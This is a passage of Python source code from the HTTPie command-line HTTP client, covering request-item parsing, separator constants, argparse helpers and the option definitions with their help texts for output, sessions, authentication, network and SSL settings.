argparse.ZERO_OR_MORE, Qualifiers.ONE_OR_MORE: argparse.ONE_OR_MORE } ARGPARSE_IGNORE_KEYS = ('short_help', 'nested_options') def to_argparse( abstract_options: ParserSpec, parser_type: ParserType = HTTPieArgumentParser, ) -> ParserType: concrete_parser = parser_type( prog=abstract_options.program, description=abstract_options.description, epilog=abstract_options.epilog, ) concrete_parser.spec = abstract_options concrete_parser.register('action', 'lazy_choices', LazyChoices) concrete_parser.register('action', 'manual', Manual) for abstract_group in abstract_options.groups: concrete_group = concrete_parser.add_argument_group( title=abstract_group.name, description=abstract_group.description ) if abstract_group.is_mutually_exclusive: concrete_group = concrete_group.add_mutually_exclusive_group(required=False) for abstract_argument in abstract_group.arguments: concrete_group.add_argument( *abstract_argument.aliases, **drop_keys(map_qualifiers( abstract_argument.configuration, ARGPARSE_QUALIFIER_MAP ), ARGPARSE_IGNORE_KEYS) ) return concrete_parser JSON_DIRECT_MIRROR_OPTIONS = ( 'choices', 'metavar' ) JSON_QUALIFIER_TO_OPTIONS = { Qualifiers.OPTIONAL: {'is_optional': True}, Qualifiers.ZERO_OR_MORE: {'is_optional': True, 'is_variadic': True}, Qualifiers.ONE_OR_MORE: {'is_optional': False, 'is_variadic': True}, Qualifiers.SUPPRESS: {} } def to_data(abstract_options: ParserSpec) -> Dict[str, Any]: return {'version': PARSER_SPEC_VERSION, 'spec': abstract_options.serialize()} def parser_to_parser_spec(parser: argparse.ArgumentParser, **kwargs) -> ParserSpec: """Take an existing argparse parser, and create a spec from it.""" return ParserSpec( program=parser.prog, description=parser.description, epilog=parser.epilog, **kwargs ) File: httpie/cli/requestitems.py import os import functools from typing import Callable, Dict, IO, List, Optional, Tuple, Union from .argtypes import KeyValueArg from .constants import ( SEPARATORS_GROUP_MULTIPART, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, SEPARATOR_GROUP_NESTED_JSON_ITEMS, SEPARATOR_DATA_RAW_JSON, SEPARATOR_DATA_STRING, SEPARATOR_FILE_UPLOAD, SEPARATOR_FILE_UPLOAD_TYPE, SEPARATOR_HEADER, SEPARATOR_HEADER_EMPTY, SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_PARAM, SEPARATOR_QUERY_EMBED_FILE, RequestType ) from .dicts import ( BaseMultiDict, MultipartRequestDataDict, RequestDataDict, RequestFilesDict, HTTPHeadersDict, RequestJSONDataDict, RequestQueryParamsDict, ) from .exceptions import ParseError from .nested_json import interpret_nested_json from ..utils import get_content_type, load_json_preserve_order_and_dupe_keys, split_iterable class RequestItems: def __init__(self, request_type: Optional[RequestType] = None): self.headers = HTTPHeadersDict() self.request_type = request_type self.is_json = request_type is None or request_type is RequestType.JSON self.data = RequestJSONDataDict() if self.is_json else RequestDataDict() self.files = RequestFilesDict() self.params = RequestQueryParamsDict() # To preserve the order of fields in file upload multipart requests. self.multipart_data = MultipartRequestDataDict() @classmethod def from_args( cls, request_item_args: List[KeyValueArg], request_type: Optional[RequestType] = None, ) -> 'RequestItems': instance = cls(request_type=request_type) rules: Dict[str, Tuple[Callable, dict]] = { SEPARATOR_HEADER: ( process_header_arg, instance.headers, ), SEPARATOR_HEADER_EMPTY: ( process_empty_header_arg, instance.headers, ), SEPARATOR_HEADER_EMBED: ( process_embed_header_arg, instance.headers, ), SEPARATOR_QUERY_PARAM: ( process_query_param_arg, instance.params, ), SEPARATOR_QUERY_EMBED_FILE: ( process_embed_query_param_arg, instance.params, ), SEPARATOR_FILE_UPLOAD: ( process_file_upload_arg, instance.files, ), SEPARATOR_DATA_STRING: ( process_data_item_arg, instance.data, ), SEPARATOR_DATA_EMBED_FILE_CONTENTS: ( process_data_embed_file_contents_arg, instance.data, ), SEPARATOR_GROUP_NESTED_JSON_ITEMS: ( process_data_nested_json_embed_args, instance.data, ), SEPARATOR_DATA_RAW_JSON: ( convert_json_value_to_form_if_needed( in_json_mode=instance.is_json, processor=process_data_raw_json_embed_arg ), instance.data, ), SEPARATOR_DATA_EMBED_RAW_JSON_FILE: ( convert_json_value_to_form_if_needed( in_json_mode=instance.is_json, processor=process_data_embed_raw_json_file_arg, ), instance.data, ), } if instance.is_json: json_item_args, request_item_args = split_iterable( iterable=request_item_args, key=lambda arg: arg.sep in SEPARATOR_GROUP_NESTED_JSON_ITEMS ) if json_item_args: pairs = [(arg.key, rules[arg.sep][0](arg)) for arg in json_item_args] processor_func, target_dict = rules[SEPARATOR_GROUP_NESTED_JSON_ITEMS] value = processor_func(pairs) target_dict.update(value) # Then handle all other items. for arg in request_item_args: processor_func, target_dict = rules[arg.sep] value = processor_func(arg) if arg.sep in SEPARATORS_GROUP_MULTIPART: instance.multipart_data[arg.key] = value if isinstance(target_dict, BaseMultiDict): target_dict.add(arg.key, value) else: target_dict[arg.key] = value return instance JSONType = Union[str, bool, int, list, dict] def process_header_arg(arg: KeyValueArg) -> Optional[str]: return arg.value or None def process_embed_header_arg(arg: KeyValueArg) -> str: return load_text_file(arg).rstrip('\n') def process_empty_header_arg(arg: KeyValueArg) -> str: if not arg.value: return arg.value raise ParseError( f'Invalid item {arg.orig!r} (to specify an empty header use `Header;`)' ) def process_query_param_arg(arg: KeyValueArg) -> str: return arg.value def process_embed_query_param_arg(arg: KeyValueArg) -> str: return load_text_file(arg).rstrip('\n') def process_file_upload_arg(arg: KeyValueArg) -> Tuple[str, IO, str]: parts = arg.value.split(SEPARATOR_FILE_UPLOAD_TYPE) filename = parts[0] mime_type = parts[1] if len(parts) > 1 else None try: f = open(os.path.expanduser(filename), 'rb') except OSError as e: raise ParseError(f'{arg.orig!r}: {e}') return ( os.path.basename(filename), f, mime_type or get_content_type(filename), ) def convert_json_value_to_form_if_needed(in_json_mode: bool, processor: Callable[[KeyValueArg], JSONType]) -> Callable[[], str]: """ We allow primitive values to be passed to forms via JSON key/value syntax. But complex values lead to an error because there’s no clear way to serialize them. """ if in_json_mode: return processor @functools.wraps(processor) def wrapper(*args, **kwargs) -> str: try: output = processor(*args, **kwargs) except ParseError: output = None if isinstance(output, (str, int, float)): return str(output) else: raise ParseError('Cannot use complex JSON value types with --form/--multipart.') return wrapper def process_data_item_arg(arg: KeyValueArg) -> str: return arg.value def process_data_embed_file_contents_arg(arg: KeyValueArg) -> str: return load_text_file(arg) def process_data_embed_raw_json_file_arg(arg: KeyValueArg) -> JSONType: contents = load_text_file(arg) value = load_json(arg, contents) return value def process_data_raw_json_embed_arg(arg: KeyValueArg) -> JSONType: value = load_json(arg, arg.value) return value def process_data_nested_json_embed_args(pairs) -> Dict[str, JSONType]: return interpret_nested_json(pairs) def load_text_file(item: KeyValueArg) -> str: path = item.value try: with open(os.path.expanduser(path), 'rb') as f: return f.read().decode() except OSError as e: raise ParseError(f'{item.orig!r}: {e}') except UnicodeDecodeError: raise ParseError( f'{item.orig!r}: cannot embed the content of {item.value!r},' ' not a UTF-8 or ASCII-encoded text file' ) def load_json(arg: KeyValueArg, contents: str) -> JSONType: try: return load_json_preserve_order_and_dupe_keys(contents) except ValueError as e: raise ParseError(f'{arg.orig!r}: {e}') File: httpie/cli/constants.py """Parsing and processing of CLI input (args, auth credentials, files, stdin). """ import enum import re URL_SCHEME_RE = re.compile(r'^[a-z][a-z0-9.+-]*://', re.IGNORECASE) HTTP_POST = 'POST' HTTP_GET = 'GET' HTTP_OPTIONS = 'OPTIONS' # Various separators used in args SEPARATOR_HEADER = ':' SEPARATOR_HEADER_EMPTY = ';' SEPARATOR_CREDENTIALS = ':' SEPARATOR_PROXY = ':' SEPARATOR_HEADER_EMBED = ':@' SEPARATOR_DATA_STRING = '=' SEPARATOR_DATA_RAW_JSON = ':=' SEPARATOR_FILE_UPLOAD = '@' SEPARATOR_FILE_UPLOAD_TYPE = ';type=' # in already parsed file upload path only SEPARATOR_DATA_EMBED_FILE_CONTENTS = '=@' SEPARATOR_DATA_EMBED_RAW_JSON_FILE = ':=@' SEPARATOR_QUERY_PARAM = '==' SEPARATOR_QUERY_EMBED_FILE = '==@' # Separators that become request data SEPARATOR_GROUP_DATA_ITEMS = frozenset({ SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_FILE_UPLOAD, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE }) SEPARATORS_GROUP_MULTIPART = frozenset({ SEPARATOR_DATA_STRING, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_FILE_UPLOAD, }) # Separators for items whose value is a filename to be embedded SEPARATOR_GROUP_DATA_EMBED_ITEMS = frozenset({ SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_EMBED_FILE, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, }) # Separators for nested JSON items SEPARATOR_GROUP_NESTED_JSON_ITEMS = frozenset([ SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, ]) # Separators allowed in ITEM arguments SEPARATOR_GROUP_ALL_ITEMS = frozenset({ SEPARATOR_HEADER, SEPARATOR_HEADER_EMPTY, SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_PARAM, SEPARATOR_QUERY_EMBED_FILE, SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_FILE_UPLOAD, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, }) # Output options OUT_REQ_HEAD = 'H' OUT_REQ_BODY = 'B' OUT_RESP_HEAD = 'h' OUT_RESP_BODY = 'b' OUT_RESP_META = 'm' BASE_OUTPUT_OPTIONS = frozenset({ OUT_REQ_HEAD, OUT_REQ_BODY, OUT_RESP_HEAD, OUT_RESP_BODY, }) OUTPUT_OPTIONS = frozenset({ *BASE_OUTPUT_OPTIONS, OUT_RESP_META, }) # Pretty class PrettyOptions(enum.Enum): STDOUT_TTY_ONLY = enum.auto() PRETTY_MAP = { 'all': ['format', 'colors'], 'colors': ['colors'], 'format': ['format'], 'none': [] } PRETTY_STDOUT_TTY_ONLY = PrettyOptions.STDOUT_TTY_ONLY DEFAULT_FORMAT_OPTIONS = [ 'headers.sort:true', 'json.format:true', 'json.indent:4', 'json.sort_keys:true', 'xml.format:true', 'xml.indent:2', ] SORTED_FORMAT_OPTIONS = [ 'headers.sort:true', 'json.sort_keys:true', ] SORTED_FORMAT_OPTIONS_STRING = ','.join(SORTED_FORMAT_OPTIONS) UNSORTED_FORMAT_OPTIONS_STRING = ','.join( option.replace('true', 'false') for option in SORTED_FORMAT_OPTIONS) # Defaults OUTPUT_OPTIONS_DEFAULT = OUT_RESP_HEAD + OUT_RESP_BODY OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED = OUT_RESP_BODY OUTPUT_OPTIONS_DEFAULT_OFFLINE = OUT_REQ_HEAD + OUT_REQ_BODY class RequestType(enum.Enum): FORM = enum.auto() MULTIPART = enum.auto() JSON = enum.auto() File: httpie/cli/__init__.py File: httpie/cli/utils.py import argparse from typing import Any, Callable, Generic, Iterator, Iterable, Optional, TypeVar T = TypeVar('T') class Manual(argparse.Action): def __init__( self, option_strings, dest=argparse.SUPPRESS, default=argparse.SUPPRESS, help=None ): super().__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help ) def __call__(self, parser, namespace, values, option_string=None): parser.print_manual() parser.exit() class LazyChoices(argparse.Action, Generic[T]): def __init__( self, *args, getter: Callable[[], Iterable[T]], help_formatter: Optional[Callable[[T, bool], str]] = None, sort: bool = False, cache: bool = True, isolation_mode: bool = False, **kwargs ) -> None: self.getter = getter self.help_formatter = help_formatter self.sort = sort self.cache = cache self.isolation_mode = isolation_mode self._help: Optional[str] = None self._obj: Optional[Iterable[T]] = None super().__init__(*args, **kwargs) self.choices = self def load(self) -> T: if self._obj is None or not self.cache: self._obj = self.getter() assert self._obj is not None return self._obj @property def help(self) -> str: if self._help is None and self.help_formatter is not None: self._help = self.help_formatter( self.load(), isolation_mode=self.isolation_mode ) return self._help @help.setter def help(self, value: Any) -> None: self._help = value def __contains__(self, item: Any) -> bool: return item in self.load() def __iter__(self) -> Iterator[T]: if self.sort: return iter(sorted(self.load())) else: return iter(self.load()) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, values) File: httpie/cli/definition.py from __future__ import annotations import os import textwrap from argparse import FileType from httpie import __doc__, __version__ from httpie.cli.argtypes import (KeyValueArgType, SessionNameValidator, SSLCredentials, readable_file_arg, response_charset_type, response_mime_type) from httpie.cli.constants import (BASE_OUTPUT_OPTIONS, DEFAULT_FORMAT_OPTIONS, OUT_REQ_BODY, OUT_REQ_HEAD, OUT_RESP_BODY, OUT_RESP_HEAD, OUT_RESP_META, OUTPUT_OPTIONS, OUTPUT_OPTIONS_DEFAULT, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY, SEPARATOR_GROUP_ALL_ITEMS, SEPARATOR_PROXY, SORTED_FORMAT_OPTIONS_STRING, UNSORTED_FORMAT_OPTIONS_STRING, RequestType) from httpie.cli.options import ParserSpec, Qualifiers, to_argparse from httpie.output.formatters.colors import (AUTO_STYLE, DEFAULT_STYLE, BUNDLED_STYLES, get_available_styles) from httpie.plugins.builtin import BuiltinAuthPlugin from httpie.plugins.registry import plugin_manager from httpie.ssl_ import AVAILABLE_SSL_VERSION_ARG_MAPPING, DEFAULT_SSL_CIPHERS_STRING # Man pages are static (built when making a release). # We use this check to not include generated, system-specific information there (e.g., default --ciphers). IS_MAN_PAGE = bool(os.environ.get('HTTPIE_BUILDING_MAN_PAGES')) options = ParserSpec( 'http', description=f'{__doc__.strip()} <https://httpie.io>', epilog=""" For every --OPTION there is also a --no-OPTION that reverts OPTION to its default value. Suggestions and bug reports are greatly appreciated: https://github.com/httpie/cli/issues """, source_file=__file__ ) ####################################################################### # Positional arguments. ####################################################################### positional_arguments = options.add_group( 'Positional arguments', description=""" These arguments come after any flags and in the order they are listed here. Only URL is required. """, ) positional_arguments.add_argument( dest='method', metavar='METHOD', nargs=Qualifiers.OPTIONAL, default=None, short_help='The HTTP method to be used for the request (GET, POST, PUT, DELETE, ...).', help=""" The HTTP method to be used for the request (GET, POST, PUT, DELETE, ...). This argument can be omitted in which case HTTPie will use POST if there is some data to be sent, otherwise GET: $ http example.org # => GET $ http example.org hello=world # => POST """, ) positional_arguments.add_argument( dest='url', metavar='URL', short_help='The request URL.', help=""" The request URL. Scheme defaults to 'http://' if the URL does not include one. (You can override this with: --default-scheme=http/https) You can also use a shorthand for localhost $ http :3000 # => http://localhost:3000 $ http :/foo # => http://localhost/foo """, ) positional_arguments.add_argument( dest='request_items', metavar='REQUEST_ITEM', nargs=Qualifiers.ZERO_OR_MORE, default=None, type=KeyValueArgType(*SEPARATOR_GROUP_ALL_ITEMS), short_help=( 'HTTPie’s request items syntax for specifying HTTP headers, JSON/Form' 'data, files, and URL parameters.' ), nested_options=[ ('HTTP Headers', 'Name:Value', 'Arbitrary HTTP header, e.g X-API-Token:123'), ('URL Parameters', 'name==value', 'Querystring parameter to the URL, e.g limit==50'), ('Data Fields', 'field=value', 'Data fields to be serialized as JSON (default) or Form Data (with --form)'), ('Raw JSON Fields', 'field:=json', 'Data field for real JSON types.'), ('File upload Fields', 'field@/dir/file', 'Path field for uploading a file.'), ], help=r""" Optional key-value pairs to be included in the request. The separator used determines the type: ':' HTTP headers: Referer:https://httpie.io Cookie:foo=bar User-Agent:bacon/1.0 '==' URL parameters to be appended to the request URI: search==httpie '=' Data fields to be serialized into a JSON object (with --json, -j) or form data (with --form, -f): name=HTTPie language=Python description='CLI HTTP client' ':=' Non-string JSON data fields (only with --json, -j): awesome:=true amount:=42 colors:='["red", "green", "blue"]' '@' Form file fields (only with --form or --multipart): cv@~/Documents/CV.pdf cv@'~/Documents/CV.pdf;type=application/pdf' '=@' A data field like '=', but takes a file path and embeds its content: essay=@Documents/essay.txt ':=@' A raw JSON field like ':=', but takes a file path and embeds its content: package:=@./package.json You can use a backslash to escape a colliding separator in the field name: field-name-with\:colon=value """, ) ####################################################################### # Content type. ####################################################################### content_types = options.add_group('Predefined content types') content_types.add_argument( '--json', '-j', action='store_const', const=RequestType.JSON, dest='request_type', short_help='(default) Serialize data items from the command line as a JSON object.', help=""" (default) Data items from the command line are serialized as a JSON object. The Content-Type and Accept headers are set to application/json (if not specified). """, ) content_types.add_argument( '--form', '-f', action='store_const', const=RequestType.FORM, dest='request_type', short_help='Serialize data items from the command line as form field data.', help=""" Data items from the command line are serialized as form fields. The Content-Type is set to application/x-www-form-urlencoded (if not specified). The presence of any file fields results in a multipart/form-data request. """, ) content_types.add_argument( '--multipart', action='store_const', const=RequestType.MULTIPART, dest='request_type', short_help=( 'Similar to --form, but always sends a multipart/form-data ' 'request (i.e., even without files).' ) ) content_types.add_argument( '--boundary', short_help=( 'Specify a custom boundary string for multipart/form-data requests. ' 'Only has effect only together with --form.' ) ) content_types.add_argument( '--raw', short_help='Pass raw request data without extra processing.', help=""" This option allows you to pass raw request data without extra processing (as opposed to the structured request items syntax): $ http --raw='data' pie.dev/post You can achieve the same by piping the data via stdin: $ echo data | http pie.dev/post Or have HTTPie load the raw data from a file: $ http pie.dev/post @data.txt """, ) ####################################################################### # Content processing. ####################################################################### processing_options = options.add_group('Content processing options') processing_options.add_argument( '--compress', '-x', action='count', default=0, short_help='Compress the content with Deflate algorithm.', help=""" Content compressed (encoded) with Deflate algorithm. The Content-Encoding header is set to deflate. Compression is skipped if it appears that compression ratio is negative. Compression can be forced by repeating the argument. """, ) ####################################################################### # Output processing ####################################################################### def format_style_help(available_styles, *, isolation_mode: bool = False): text = """ Output coloring style (default is "{default}"). It can be one of: {available_styles} """ if isolation_mode: text += '\n\n' text += 'For finding out all available styles in your system, try:\n\n' text += ' $ http --style\n' text += textwrap.dedent(""" The "{auto_style}" style follows your terminal's ANSI color styles. For non-{auto_style} styles to work properly, please make sure that the $TERM environment variable is set to "xterm-256color" or similar (e.g., via `export TERM=xterm-256color' in your ~/.bashrc). """) if isolation_mode: available_styles = sorted(BUNDLED_STYLES) available_styles_text = '\n'.join( f' {line.strip()}' for line in textwrap.wrap(', '.join(available_styles), 60) ).strip() return text.format( default=DEFAULT_STYLE, available_styles=available_styles_text, auto_style=AUTO_STYLE, ) _sorted_kwargs = { 'action': 'append_const', 'const': SORTED_FORMAT_OPTIONS_STRING, 'dest': 'format_options', } _unsorted_kwargs = { 'action': 'append_const', 'const': UNSORTED_FORMAT_OPTIONS_STRING, 'dest': 'format_options', } output_processing = options.add_group('Output processing') output_processing.add_argument( '--pretty', dest='prettify', default=PRETTY_STDOUT_TTY_ONLY, choices=sorted(PRETTY_MAP.keys()), short_help='Control the processing of console outputs.', help=""" Controls output processing. The value can be "none" to not prettify the output (default for redirected output), "all" to apply both colors and formatting (default for terminal output), "colors", or "format". """, ) output_processing.add_argument( '--style', '-s', dest='style', metavar='STYLE', default=DEFAULT_STYLE, action='lazy_choices', getter=get_available_styles, short_help=f'Output coloring style (default is "{DEFAULT_STYLE}").', help_formatter=format_style_help, ) # The closest approx. of the documented resetting to default via --no-<option>. # We hide them from the doc because they act only as low-level aliases here. output_processing.add_argument( '--no-unsorted', **_sorted_kwargs, help=Qualifiers.SUPPRESS ) output_processing.add_argument( '--no-sorted', **_unsorted_kwargs, help=Qualifiers.SUPPRESS ) output_processing.add_argument( '--unsorted', **_unsorted_kwargs, short_help='Disables all sorting while formatting output.', help=f""" Disables all sorting while formatting output. It is a shortcut for: --format-options={UNSORTED_FORMAT_OPTIONS_STRING} """, ) output_processing.add_argument( '--sorted', **_sorted_kwargs, short_help='Re-enables all sorting options while formatting output.', help=f""" Re-enables all sorting options while formatting output. It is a shortcut for: --format-options={SORTED_FORMAT_OPTIONS_STRING} """, ) output_processing.add_argument( '--response-charset', metavar='ENCODING', type=response_charset_type, short_help='Override the response encoding for terminal display purposes.', help=""" Override the response encoding for terminal display purposes, e.g.: --response-charset=utf8 --response-charset=big5 """, ) output_processing.add_argument( '--response-mime', metavar='MIME_TYPE', type=response_mime_type, short_help='Override the response mime type for coloring and formatting for the terminal.', help=""" Override the response mime type for coloring and formatting for the terminal, e.g.: --response-mime=application/json --response-mime=text/xml """, ) output_processing.add_argument( '--format-options', action='append', short_help='Controls output formatting.', help=""" Controls output formatting. Only relevant when formatting is enabled through (explicit or implied) --pretty=all or --pretty=format. The following are the default options: {option_list} You may use this option multiple times, as well as specify multiple comma-separated options at the same time. For example, this modifies the settings to disable the sorting of JSON keys, and sets the indent size to 2: --format-options json.sort_keys:false,json.indent:2 This is something you will typically put into your config file. """.format( option_list='\n'.join( f' {option}' for option in DEFAULT_FORMAT_OPTIONS ).strip() ), ) ####################################################################### # Output options ####################################################################### output_options = options.add_group('Output options') output_options.add_argument( '--print', '-p', dest='output_options', metavar='WHAT', short_help='Options to specify what the console output should contain.', help=f""" String specifying what the output should contain: '{OUT_REQ_HEAD}' request headers '{OUT_REQ_BODY}' request body '{OUT_RESP_HEAD}' response headers '{OUT_RESP_BODY}' response body '{OUT_RESP_META}' response metadata The default behaviour is '{OUTPUT_OPTIONS_DEFAULT}' (i.e., the response headers and body is printed), if standard output is not redirected. If the output is piped to another program or to a file, then only the response body is printed by default. """, ) output_options.add_argument( '--headers', '-h', dest='output_options', action='store_const', const=OUT_RESP_HEAD, short_help='Print only the response headers.', help=f""" Print only the response headers. Shortcut for --print={OUT_RESP_HEAD}. """, ) output_options.add_argument( '--meta', '-m', dest='output_options', action='store_const', const=OUT_RESP_META, short_help='Print only the response metadata.', help=f""" Print only the response metadata. Shortcut for --print={OUT_RESP_META}. """, ) output_options.add_argument( '--body', '-b', dest='output_options', action='store_const', const=OUT_RESP_BODY, short_help='Print only the response body.', help=f""" Print only the response body. Shortcut for --print={OUT_RESP_BODY}. """, ) output_options.add_argument( '--verbose', '-v', dest='verbose', action='count', default=0, short_help='Make output more verbose.', help=f""" Verbose output. For the level one (with single `-v`/`--verbose`), print the whole request as well as the response. Also print any intermediary requests/responses (such as redirects). For the second level and higher, print these as well as the response metadata. Level one is a shortcut for: --all --print={''.join(sorted(BASE_OUTPUT_OPTIONS))} Level two is a shortcut for: --all --print={''.join(sorted(OUTPUT_OPTIONS))} """, ) output_options.add_argument( '--all', default=False, action='store_true', short_help='Show any intermediary requests/responses.', help=""" By default, only the final request/response is shown. Use this flag to show any intermediary requests/responses as well. Intermediary requests include followed redirects (with --follow), the first unauthorized request when Digest auth is used (--auth=digest), etc. """, ) output_options.add_argument( '--history-print', '-P', dest='output_options_history', metavar='WHAT', help=Qualifiers.SUPPRESS, ) output_options.add_argument( '--stream', '-S', action='store_true', default=False, short_help='Always stream the response body by line, i.e., behave like `tail -f`.', help=""" Always stream the response body by line, i.e., behave like `tail -f'. Without --stream and with --pretty (either set or implied), HTTPie fetches the whole response before it outputs the processed data. Set this option when you want to continuously display a prettified long-lived response, such as one from the Twitter streaming API. It is useful also without --pretty: It ensures that the output is flushed more often and in smaller chunks. """, ) output_options.add_argument( '--output', '-o', type=FileType('a+b'), dest='output_file', metavar='FILE', short_help='Save output to FILE instead of stdout.', help=""" Save output to FILE instead of stdout. If --download is also set, then only the response body is saved to FILE. Other parts of the HTTP exchange are printed to stderr. """, ) output_options.add_argument( '--download', '-d', action='store_true', default=False, short_help='Download the body to a file instead of printing it to stdout.', help=""" Do not print the response body to stdout. Rather, download it and store it in a file. The filename is guessed unless specified with --output [filename]. This action is similar to the default behaviour of wget. """, ) output_options.add_argument( '--continue', '-c', dest='download_resume', action='store_true', default=False, short_help='Resume an interrupted download (--output needs to be specified).', help=""" Resume an interrupted download. Note that the --output option needs to be specified as well. """, ) output_options.add_argument( '--quiet', '-q', action='count', default=0, short_help='Do not print to stdout or stderr, except for errors and warnings when provided once.', help=""" Do not print to stdout or stderr, except for errors and warnings when provided once. Provide twice to suppress warnings as well. stdout is still redirected if --output is specified. Flag doesn't affect behaviour of download beyond not printing to terminal. """, ) ####################################################################### # Sessions ####################################################################### session_name_validator = SessionNameValidator( 'Session name contains invalid characters.' ) sessions = options.add_group('Sessions', is_mutually_exclusive=True) sessions.add_argument( '--session', metavar='SESSION_NAME_OR_PATH', type=session_name_validator, short_help='Create, or reuse and update a session.', help=""" Create, or reuse and update a session. Within a session, custom headers, auth credential, as well as any cookies sent by the server persist between requests. Session files are stored in: [HTTPIE_CONFIG_DIR]/<HOST>/<SESSION_NAME>.json. See the following page to find out your default HTTPIE_CONFIG_DIR: https://httpie.io/docs/cli/config-file-directory """, ) sessions.add_argument( '--session-read-only', metavar='SESSION_NAME_OR_PATH', type=session_name_validator, short_help='Create or read a session without updating it', help=""" Create or read a session without updating it form the request/response exchange. """, ) ####################################################################### # Authentication ####################################################################### def format_auth_help(auth_plugins_mapping, *, isolation_mode: bool = False): text = """ The authentication mechanism to be used. Defaults to "{default}". {auth_types} """ auth_plugins = list(auth_plugins_mapping.values()) if isolation_mode: auth_plugins = [ auth_plugin for auth_plugin in auth_plugins if issubclass(auth_plugin, BuiltinAuthPlugin) ] text += '\n' text += 'To see all available auth types on your system, including ones installed via plugins, run:\n\n' text += ' $ http --auth-type' auth_types = '\n\n '.join( '"{type}": {name}{package}{description}'.format( type=plugin.auth_type, name=plugin.name, package=( '' if issubclass(plugin, BuiltinAuthPlugin) else f' (provided by {plugin.package_name})' ), description=( '' if not plugin.description else '\n ' + ('\n '.join(textwrap.wrap(plugin.description))) ), ) for plugin in auth_plugins ) return text.format( default=auth_plugins[0].auth_type, auth_types=auth_types, ) authentication = options.add_group('Authentication') authentication.add_argument( '--auth', '-a', default=None, metavar='USER[:PASS] | TOKEN', short_help='Credentials for the selected (-A) authentication method.', help=""" For username/password based authentication mechanisms (e.g basic auth or digest auth) if only the username is provided (-a username), HTTPie will prompt for the password. """, ) authentication.add_argument( '--auth-type', '-A', action='lazy_choices', default=None, getter=plugin_manager.get_auth_plugin_mapping, sort=True, cache=False, short_help='The authentication mechanism to be used.', help_formatter=format_auth_help, ) authentication.add_argument( '--ignore-netrc', default=False, action='store_true', short_help='Ignore credentials from .netrc.' ) ####################################################################### # Network ####################################################################### network = options.add_group('Network') network.add_argument( '--offline', default=False, action='store_true', short_help='Build the request and print it but don’t actually send it.' ) network.add_argument( '--proxy', default=[], action='append', metavar='PROTOCOL:PROXY_URL', type=KeyValueArgType(SEPARATOR_PROXY), short_help='String mapping of protocol to the URL of the proxy.', help=""" String mapping protocol to the URL of the proxy (e.g. http:http://foo.bar:3128). You can specify multiple proxies with different protocols. The environment variables $ALL_PROXY, $HTTP_PROXY, and $HTTPS_proxy are supported as well. """, ) network.add_argument( '--follow', '-F', default=False, action='store_true', short_help='Follow 30x Location redirects.' ) network.add_argument( '--max-redirects', type=int, default=30, short_help='The maximum number of redirects that should be followed (with --follow).', help=""" By default, requests have a limit of 30 redirects (works with --follow). """, ) network.add_argument( '--max-headers', type=int, default=0, short_help=( 'The maximum number of response headers to be read before ' 'giving up (default 0, i.e., no limit).' ) ) network.add_argument( '--timeout', type=float, default=0, metavar='SECONDS', short_help='The connection timeout of the request in seconds.', help=""" The connection timeout of the request in seconds. The default value is 0, i.e., there is no timeout limit. This is not a time limit on the entire response download; rather, an error is reported if the server has not issued a response for timeout seconds (more precisely, if no bytes have been received on the underlying socket for timeout seconds). """, ) network.add_argument( '--check-status', default=False, action='store_true', short_help='Exit with an error status code if the server replies with an error.', help=""" By default, HTTPie exits with 0 when no network or other fatal errors occur. This flag instructs HTTPie to also check the HTTP status code and exit with an error if the status indicates one. When the server replies with a 4xx (Client Error) or 5xx (Server Error) status code, HTTPie exits with 4 or 5 respectively. If the response is a 3xx (Redirect) and --follow hasn't been set, then the exit status is 3. Also an error message is written to stderr if stdout is redirected. """, ) network.add_argument( '--path-as-is', default=False, action='store_true', short_help='Bypass dot segment (/../ or /./) URL squashing.' ) network.add_argument( '--chunked', default=False, action='store_true', short_help=( 'Enable streaming via chunked transfer encoding. ' 'The Transfer-Encoding header is set to chunked.' ) ) ####################################################################### # SSL ####################################################################### ssl = options.add_group('SSL') ssl.add_argument( '--verify', default='yes', short_help='If "no", skip SSL verification. If a file path, use it as a CA bundle.', help=""" Set to "no" (or "false") to skip checking the host's SSL certificate. Defaults to "yes" ("true"). You can also pass the path to a CA_BUNDLE file for private certs. (Or you can set the REQUESTS_CA_BUNDLE environment variable instead.) """, ) ssl.add_argument( '--ssl', dest='ssl_version', choices=sorted(AVAILABLE_SSL_VERSION_ARG_MAPPING.keys()), short_help='The desired protocol version to used.', help=""" The desired protocol version to use. This will default to SSL v2.3 which will negotiate the highest protocol that both the server and your installation of OpenSSL support. Available protocols may vary depending on OpenSSL installation (only the supported ones are shown here). """, ) CIPHERS_CURRENT_DEFAULTS = ( """ See `http --help` for the default ciphers list on you system. """ if IS_MAN_PAGE else f""" By default, the following ciphers are used on your system: {DEFAULT_SSL_CIPHERS_STRING} """ ) ssl.add_argument( '--ciphers', short_help='A string in the OpenSSL cipher list format.', help=f""" A string in the OpenSSL cipher list format. {CIPHERS_CURRENT_DEFAULTS} """ ) ssl.add_argument( '--cert', default=None, type=readable_file_arg, short_help='Specifies a local cert to use as the client-side SSL certificate.', help=""" You can specify a local cert to use as client side SSL certificate. This file may either contain both private key and certificate or you may specify --cert-key separately. """, ) ssl.add_argument( '--cert-key', default=None, type=readable_file_arg, short_help='The private key to use with SSL. Only needed if --cert is given.', help=""" The private key to use with SSL. Only needed if --cert is given and the certificate file does not contain the private key. """, ) ssl.add_argument( '--cert-key-pass', default=None, type=SSLCredentials, short_help='The passphrase to be used to with the given private key.', help=""" The passphrase to be 